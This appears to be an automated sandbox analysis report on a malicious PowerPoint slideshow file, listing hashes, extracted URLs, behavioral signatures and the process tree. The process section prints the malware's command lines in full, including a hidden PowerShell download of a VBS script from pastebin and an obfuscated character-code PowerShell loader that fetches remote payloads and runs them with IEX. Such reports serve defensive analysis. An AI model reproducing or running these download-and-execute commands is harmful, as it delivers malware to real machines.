Analysis
-
max time kernel
135s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
26-05-2024 04:47
Behavioral task
behavioral1
Sample
745db86a63082c422777fb646723ab1d_JaffaCakes118.pps
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
745db86a63082c422777fb646723ab1d_JaffaCakes118.pps
Resource
win10v2004-20240508-en
General
-
Target
745db86a63082c422777fb646723ab1d_JaffaCakes118.pps
-
Size
58KB
-
MD5
745db86a63082c422777fb646723ab1d
-
SHA1
41864d39e704ade8f560063b59b368c1031c3c40
-
SHA256
232f5aeb67a605446b4876aa000e202aeb2cc6bfea17d9156a1b18ccae3a4a00
-
SHA512
9a3d30179d3747e5dd1ae87378361f290c333816ca7877ae5aff03fe69cb0af8528f6fedfaa1a235b3f000c3f99cf9de8c44649126bea31605e1d5962740867a
-
SSDEEP
384:QzEIIk/7G6wXpzRprR+HpExvYzCoiCg/:34/7G6GzRprRyOvXoiCg
Malware Config
Extracted
https://pastebin.com/raw/DG0EBdFy
Extracted
https://gritodopovo.com.br/RumpeTarefa.jpg
https://gritodopovo.com.br/module01.jpg
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1244 864 powershell.exe 82 Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1412 864 cmd.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2856 1944 Powershell.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1320 1944 cmd.exe 83 -
Blocklisted process makes network request 1 IoCs
flow pid Process 22 1244 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1244 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 21 pastebin.com 22 pastebin.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2736 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 864 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1244 powershell.exe 1244 powershell.exe 2856 Powershell.exe 2856 Powershell.exe 2856 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1244 powershell.exe Token: SeDebugPrivilege 2856 Powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 864 POWERPNT.EXE 864 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 864 wrote to memory of 1244 864 POWERPNT.EXE 85 PID 864 wrote to memory of 1244 864 POWERPNT.EXE 85 PID 864 wrote to memory of 1412 864 POWERPNT.EXE 87 PID 864 wrote to memory of 1412 864 POWERPNT.EXE 87 PID 1412 wrote to memory of 2736 1412 cmd.exe 90 PID 1412 wrote to memory of 2736 1412 cmd.exe 90 PID 1412 wrote to memory of 4740 1412 cmd.exe 102 PID 1412 wrote to memory of 4740 1412 cmd.exe 102 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\745db86a63082c422777fb646723ab1d_JaffaCakes118.pps" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/DG0EBdFy','C:\Users\Public\AdobePDF.vbs')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AdobePDF.vbs2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
PID:2736
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\AdobePDF.vbs"3⤵PID:4740
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $LOLO=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,103,114,105,116,111,100,111,112,111,118,111,46,99,111,109,46,98,114,47,82,117,109,112,101,84,97,114,101,102,97,46,106,112,103,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,103,114,105,116,111,100,111,112,111,118,111,46,99,111,109,46,98,114,47,109,111,100,117,108,101,48,49,46,106,112,103,39,41,46,114,101,112,108,97,99,101,40,39,46,46,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,82,101,103,65,115,109,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($LOLO)|IEX1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
C:\Windows\system32\cmd.execmd /c copy "C:\Users\Public\AdobePDF.vbs" "C:\Users\Admin\AppData\Roaming" /Y1⤵
- Process spawned unexpected child process
PID:1320
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD58b4f57dee4c499315c9d386f2ce91363
SHA13696de083e9224a600a6e94ce13386124a6ec749
SHA256e20c93595a1818a1a0ccdc072ff930866b81664e99c22af0c1e1e2585146a57f
SHA5129aea8f4faed362335bc9dd1156d2b67c0a59e078e0d53acd35e937deb5141f59723a6bc30c9f0ac0033e297e03dd2b252370bcf9d8768783fe238ad9ed2ba41f